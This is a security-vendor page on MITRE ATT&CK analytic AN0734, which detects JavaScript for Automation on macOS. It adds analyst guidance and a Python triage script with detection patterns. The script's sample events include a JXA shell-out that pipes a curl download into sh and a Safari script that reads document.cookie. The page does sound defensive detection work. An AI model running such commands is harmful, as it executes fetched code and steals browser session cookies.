MITRE ATT&CK® Analytic

AN0734: Analytic 0734

Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse.

Domain: Enterprise | ID: AN0734 | Type: Analytic | Object version: 1.0 | Modified: (not recorded in this snapshot)
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This analytic matters because JavaScript for Automation on macOS turns an ordinary scripting feature into a way to modify the system, drive other applications, or interact with browsers. For leaders, the point is not to assume that "macOS scripting" is harmless: coverage depends on whether the organization can see osascript activity, compiled-script execution, and OSAKit-related behavior well enough to support SOC triage and incident response decisions.

Executive priority

Prioritize this as a macOS visibility and response-readiness question. Security leaders should ask whether managed detection, endpoint logging, and incident response playbooks can distinguish legitimate automation from suspicious JXA behavior involving system modification, inter-process scripting, or browser abuse. This is especially relevant for organizations with material macOS fleets, privileged user workstations, developer systems, or compliance requirements that depend on demonstrable endpoint monitoring.

Technical view

The supplied ATT&CK analytic is for macOS and focuses on detecting JXA run through osascript (for example osascript -l JavaScript with -e inline code or a script file path) or through compiled scripts executed with OSAKit APIs. SOC and detection teams should validate whether endpoint telemetry captures osascript process execution, the launch context of script files and compiled scripts (path, language flag, and, where the sensor collects it, script content), parent/child process relationships, and application automation behavior such as Apple Events sent to other applications. Because no official detection logic is provided, teams should treat this as a detection-engineering requirement rather than a ready-made rule.

Likely telemetry

  • macOS process execution telemetry, especially osascript invocation
  • Parent and child process relationships around scripting activity
  • Command-line arguments or script execution metadata where collected
  • Endpoint security events showing system modification attempts
  • Inter-process scripting or application automation events where available

Detection direction

  • Validate visibility for both osascript-based JXA and compiled scripts run through OSAKit APIs. A compiled script can run as a standalone applet or inside another application that links OSAKit.framework, with no osascript process at all, so a rule that only matches the osascript process name misses those cases; the applet's own process execution or framework-load telemetry is needed to see them.
  • Tune around behavior described by the analytic: system modification, inter-process scripting, and browser abuse, rather than alerting on all automation equally.
  • Establish baselines for legitimate macOS automation used by IT, administrators, developers, and business workflows to reduce false positives.
  • Correlate script execution with unusual parent processes, unexpected user context, sensitive application interaction, or system-change activity.
  • Document telemetry gaps explicitly, since the ATT&CK object does not provide official detection logic or tactic mapping.
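As an added, illustrative example (not MITRE's analytic and not any vendor's rule), the following Python turns the technical view and the detection-direction bullets above into triage logic run over constructed macOS process events. The event fields, the behaviour indicator patterns, their weights, and the list of expected parent processes are assumptions made for the example; a real deployment would derive the parent baseline and weights from the fleet's own automation inventory.

```python
"""Illustrative JXA triage over constructed macOS process events.

Added example for this page: not MITRE's analytic and not a vendor rule. The
event shape (process, args, parent, user, loaded_images, script_text) is an
assumption modeled on typical EDR / Endpoint Security process telemetry.
"""
import re
from dataclasses import dataclass, field

# JXA idioms grouped by the three behaviour themes the analytic names. Patterns
# run against inline -e arguments and, if the sensor captured it, the script
# body. Weights are assumed values for how much each theme raises the score.
BEHAVIOURS = {
    "system_modification": (2, [
        r"doShellScript\s*\(",                       # StandardAdditions shell-out
        r"\$\.NS(Task|FileManager|UserDefaults)\b",  # ObjC bridge for process/file work
        r"launchctl|LaunchAgents|LaunchDaemons|defaults\s+write",
    ]),
    "inter_process_scripting": (1, [
        r"Application\(\s*['\"]System Events['\"]\s*\)",
        r"Application\(\s*['\"]Finder['\"]\s*\)",
        r"\.keystroke\(|\.click\(",                  # UI scripting via System Events
    ]),
    "browser_abuse": (2, [
        r"Application\(\s*['\"](Safari|Google Chrome|Firefox|Microsoft Edge)['\"]\s*\)",
        r"doJavaScript\s*\(",                        # Safari: run JS inside a page
        r"\.execute\(\s*\{\s*javascript",            # Chrome: tab.execute({javascript: ...})
    ]),
}

# Parents from which script launches are routine in many fleets. Assumed baseline.
EXPECTED_PARENTS = {"Terminal", "iTerm2", "sshd", "launchd", "Script Editor", "jamf"}
UNUSUAL_PARENT_WEIGHT = 1


@dataclass
class ProcEvent:
    process: str                 # executable name as the sensor reports it
    args: list                   # argv without argv[0]
    parent: str                  # parent executable name
    user: str
    loaded_images: list = field(default_factory=list)  # frameworks/dylibs mapped in
    script_text: str = ""        # script file contents, only if the sensor captured them


def jxa_vector(ev):
    """Classify how the event runs OSA code, or None if it does not."""
    if ev.process == "osascript":
        args = ev.args
        for i, a in enumerate(args):
            if a == "-l" and i + 1 < len(args) and args[i + 1].lower() == "javascript":
                return "osascript-jxa"
        first_line = ev.script_text.splitlines()[0] if ev.script_text else ""
        if first_line.startswith("#!") and "javascript" in first_line.lower():
            return "osascript-jxa"           # '#!/usr/bin/osascript -l JavaScript' script
        if any(a.endswith((".js", ".jxa")) for a in args):
            return "osascript-jxa"
        if any(a.endswith((".scpt", ".scptd")) for a in args):
            return "osascript-compiled"      # language is not visible on the command line
        return None                          # plain AppleScript: outside this analytic
    if any("OSAKit.framework" in img for img in ev.loaded_images):
        return "osakit-native"               # Script Editor applet or custom OSAKit client
    return None


def score_event(ev):
    """Return a finding dict for OSA-bearing events, or None."""
    vector = jxa_vector(ev)
    if vector is None:
        return None
    text = " ".join(ev.args) + "\n" + ev.script_text
    behaviours, score = [], 0
    for name, (weight, patterns) in BEHAVIOURS.items():
        if any(re.search(p, text) for p in patterns):
            behaviours.append(name)
            score += weight
    unusual_parent = ev.parent not in EXPECTED_PARENTS
    if unusual_parent:
        score += UNUSUAL_PARENT_WEIGHT
    severity = ("high" if score >= 3 else "medium" if score == 2
                else "low" if score == 1 else "info")
    return {"process": ev.process, "parent": ev.parent, "user": ev.user, "vector": vector,
            "behaviours": behaviours, "unusual_parent": unusual_parent,
            "score": score, "severity": severity}


def triage(events):
    """Findings for OSA-bearing events only, highest score first."""
    findings = [f for f in map(score_event, events) if f is not None]
    return sorted(findings, key=lambda f: f["score"], reverse=True)


SAMPLE_EVENTS = [  # constructed for the example; not real telemetry
    ProcEvent("osascript", ["-l", "JavaScript", "-e",
                            'Application("Finder").desktop.items.name()'],
              parent="Terminal", user="dev"),
    ProcEvent("osascript", ["-l", "JavaScript", "-e",
                            'var a=Application.currentApplication();a.includeStandardAdditions=true;'
                            'a.doShellScript("curl -s http://127.0.0.1/s.sh | sh");'
                            'Application("System Events").keystroke("q", {using: "command down"})'],
              parent="Microsoft Word", user="finance"),
    ProcEvent("osascript", ["-l", "JavaScript", "-e",
                            'Application("Safari").doJavaScript("document.cookie", '
                            '{in: Application("Safari").windows[0].currentTab})'],
              parent="Python", user="dev"),
    ProcEvent("applet", [], parent="launchd", user="dev",
              loaded_images=["/System/Library/Frameworks/OSAKit.framework/Versions/A/OSAKit"]),
    ProcEvent("osascript", ["/Users/dev/Library/Scripts/cleanup.scpt"], parent="launchd", user="dev"),
    ProcEvent("node", ["build.js"], parent="Terminal", user="dev"),   # not OSA at all
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['severity']:<6} score={f['score']} {f['vector']:<19} "
              f"parent={f['parent']} behaviours={f['behaviours']}")
```

Run as a script, the block prints the findings ranked by score: the Word-spawned shell-out plus System Events keystrokes and the Python-spawned Safari cookie read land at high, the Terminal-launched Finder query at low. Note what the example cannot do: for a compiled .scpt argument or an OSAKit-loading applet with no captured script body, it reports the execution vector but no behaviour, which is exactly the telemetry gap the bullets above say should be documented.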

Mitigation priorities

  • Inventory legitimate macOS automation use so defenders know what should be allowed, monitored, or investigated.
  • Ensure endpoint monitoring is deployed and configured to capture relevant macOS process and script execution evidence.
  • Restrict unnecessary scripting and automation privileges where operationally feasible, especially on high-value workstations.
  • Prepare IR triage steps for suspicious JXA, including review of process lineage, executed script context, affected applications, and system changes.
  • Use the analytic as compliance evidence only after validating local telemetry and alert handling, not merely because the ATT&CK analytic exists.

Analyst notes and limits

This is a detection analytic, not a technique description. The official description is specific to macOS JXA detection via osascript or compiled scripts using OSAKit APIs, with suspicious themes of system modification, inter-process scripting, and browser abuse. No relationship context, aliases, labels, or tactic mappings were supplied.

Because neither official detection logic nor relationships were provided, this take cannot assert specific ATT&CK techniques, adversary use, active exploitation, impact, or guaranteed detection coverage. Local macOS fleet composition, logging configuration, and legitimate automation patterns are required to operationalize it.

Official MITRE ATT&CK definition

Analytic 0734

Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 6120619ab93968f4...
Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status         | Raw hash
19.1    |                 | 1.0            |          | Current bundle | 6120619ab939…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack: AN0734 (external source URL)
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.